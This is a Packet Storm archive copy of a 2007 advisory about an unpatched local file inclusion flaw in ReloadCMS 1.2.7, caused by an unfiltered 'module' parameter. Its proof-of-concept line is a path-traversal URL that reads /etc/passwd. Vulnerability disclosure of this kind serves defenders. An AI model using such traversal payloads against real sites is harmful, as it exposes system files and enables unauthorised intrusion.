reloadcms-lfi.txt

2007-10-23T00:00:00
ID PACKETSTORM:60308
Type packetstorm
Reporter Packet Storm
Modified 2007-10-23T00:00:00

Description

                                        
                                            ` New Advisory:  
ReloadCMS  
http://reloadcms.com  
  
——————–Summary—————-  
Software: ReloadCMS  
Sowtware’s Web Site: http://reloadcms.com/main/  
Versions: 1.2.7  
Critical Level: Moderate  
Type: Multiple Vulnerabilities  
Class: Remote  
Status: Unpatched  
PoC/Exploit: Available  
Solution: Not Available  
Discovered by: http://reloadcms.com  
  
Php include bug  
  
—————–Description—————  
vulnerable mosule system.php, parameter GET['module'] is not properly filtered  
  
————–PoC/Exploit———————-  
http://site.url/index.php?module=../../../../etc/passwd  
  
————–Solution———————  
No Patch available.  
  
————–Credit———————–  
Discovered by: http://reloadcms.com  
`